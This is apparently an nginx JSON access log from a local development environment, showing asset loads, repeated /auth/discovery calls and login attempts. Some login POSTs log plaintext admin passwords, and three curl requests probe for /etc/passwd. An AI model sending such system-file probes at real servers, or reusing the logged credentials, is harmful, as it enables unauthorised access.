"05/May/2022:07:25:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"localhost","request":"GET /index.php/favicon.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"3.145","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9528/", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:07:25:10 +0000","request_body":"username=admin&password=admin","remote_addr":"172.24.0.1","http_host":"localhost","request":"POST /index.php/login/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.842","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9528/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:07:25:21 +0000","request_body":"username=11&password=111","remote_addr":"172.24.0.1","http_host":"localhost","request":"POST /index.php/login/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.431","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9528/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:07:32:06 +0000","request_body":"username=admin&password=w3admin","remote_addr":"172.24.0.1","http_host":"localhost","request":"POST /index.php/login/in HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.308","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36", "http_referer":"http://localhost:9528/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "05/May/2022:07:40:31 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.800","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "05/May/2022:07:49:34 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"502","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "06/May/2022:03:03:13 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.076","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "06/May/2022:03:03:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.443","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "06/May/2022:03:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"3.526","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "06/May/2022:03:03:33 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.391","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "06/May/2022:03:03:43 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.380","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "06/May/2022:03:03:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.701","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "06/May/2022:03:04:16 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.514","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "08/May/2022:14:14:53 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.024","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "08/May/2022:14:14:59 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.063","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "11/May/2022:05:48:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"1.569","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "11/May/2022:05:49:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.518","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "11/May/2022:05:49:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.473","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "11/May/2022:05:49:18 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"4.167","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "11/May/2022:05:49:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.064","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "11/May/2022:05:49:42 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.062","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "11/May/2022:05:50:02 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.071","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "12/May/2022:10:08:17 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.634","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "12/May/2022:10:08:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.633","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "12/May/2022:10:08:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.443","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "12/May/2022:10:08:39 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"1.483","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "12/May/2022:10:08:47 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.501","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "12/May/2022:10:09:00 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.380","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "12/May/2022:10:09:21 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.419","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:57:59 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.035","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:03 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.025","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /logo.png HTTP/1.1","status":"200","body_bytes_sents":"8003","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/js/app.ac064b66.js HTTP/1.1","status":"200","body_bytes_sents":"14404","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/css/app.3c8d8b2c.css HTTP/1.1","status":"200","body_bytes_sents":"6975","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/css/chunk-02ef4eac.824484de.css HTTP/1.1","status":"200","body_bytes_sents":"850","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/css/chunk-742fb059.b4ae666f.css HTTP/1.1","status":"200","body_bytes_sents":"870","req_time":"0.104","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/css/chunk-4dba30a6.023b4bed.css HTTP/1.1","status":"200","body_bytes_sents":"1005","req_time":"0.105","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/css/chunk-7569ddfc.38342da3.css HTTP/1.1","status":"200","body_bytes_sents":"699","req_time":"0.119","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/css/chunk-antd.eb03cbba.css HTTP/1.1","status":"200","body_bytes_sents":"73985","req_time":"0.255","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/css/chunk-a18a73a0.99f7859e.css HTTP/1.1","status":"200","body_bytes_sents":"914","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/css/chunk-790881fa.f422e5c8.css HTTP/1.1","status":"200","body_bytes_sents":"1381","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/js/chunk-02ef4eac.aee09342.js HTTP/1.1","status":"200","body_bytes_sents":"4851","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/js/chunk-4dba30a6.b9bc7940.js HTTP/1.1","status":"200","body_bytes_sents":"3003","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/js/chunk-2d0b309a.29dd3cb6.js HTTP/1.1","status":"200","body_bytes_sents":"508","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/js/chunk-antd.6c694034.js HTTP/1.1","status":"200","body_bytes_sents":"276405","req_time":"0.294","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/js/chunk-1f4107c2.459db410.js HTTP/1.1","status":"200","body_bytes_sents":"9681","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/js/chunk-742fb059.806e3b5f.js HTTP/1.1","status":"200","body_bytes_sents":"1872","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/js/chunk-a18a73a0.d127da0b.js HTTP/1.1","status":"200","body_bytes_sents":"3732","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/js/chunk-7569ddfc.e0dd8f6a.js HTTP/1.1","status":"200","body_bytes_sents":"1447","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/js/lang-en-US.cd0544be.js HTTP/1.1","status":"200","body_bytes_sents":"341","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/js/chunk-790881fa.81dd5b3c.js HTTP/1.1","status":"200","body_bytes_sents":"7322","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/js/chunk-libs.579eae3f.js HTTP/1.1","status":"200","body_bytes_sents":"396768","req_time":"0.368","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/img/logo-header.315babc1.png HTTP/1.1","status":"200","body_bytes_sents":"4641","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/img/home-5.77d25ea9.png HTTP/1.1","status":"200","body_bytes_sents":"188463","req_time":"0.119","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/img/home-bg-1.a51e01d1.png HTTP/1.1","status":"200","body_bytes_sents":"214479","req_time":"0.178","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/img/home-2.984aac1c.png HTTP/1.1","status":"200","body_bytes_sents":"147715","req_time":"0.173","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/img/home-3.c2859cf5.png HTTP/1.1","status":"200","body_bytes_sents":"153641","req_time":"0.177","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/img/icon-beian-gov.d0289dc0.png HTTP/1.1","status":"200","body_bytes_sents":"19256","req_time":"0.133","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/img/home-1.925dc205.png HTTP/1.1","status":"200","body_bytes_sents":"275775","req_time":"0.239","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /static/img/home-4.3e1632d2.png HTTP/1.1","status":"200","body_bytes_sents":"147041","req_time":"0.189","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:12 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"http://127.0.0.1/", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:06:58:15 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"304","body_bytes_sents":"0","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:07:06:25 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.026","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:07:06:28 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.030","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:07:06:31 +0000","request_body":"xxx","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"157","req_time":"0.021","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:07:09:25 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.032","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:07:09:28 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.033","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:07:10:24 +0000","request_body":"-","remote_addr":"172.27.0.1","http_host":"127.0.0.1","request":"GET /etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:07:25:33 +0000","request_body":"-","remote_addr":"172.28.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.033","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:07:28:24 +0000","request_body":"-","remote_addr":"172.28.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.020","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:07:34:03 +0000","request_body":"-","remote_addr":"172.30.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:07:47:44 +0000","request_body":"-","remote_addr":"172.30.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.028","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:07:57:09 +0000","request_body":"-","remote_addr":"172.31.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.026","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:07:57:53 +0000","request_body":"-","remote_addr":"172.31.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.026","http_user_agent":"curl/7.64.1", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:07:57:55 +0000","request_body":"-","remote_addr":"172.31.0.1","http_host":"127.0.0.1","request":"GET / 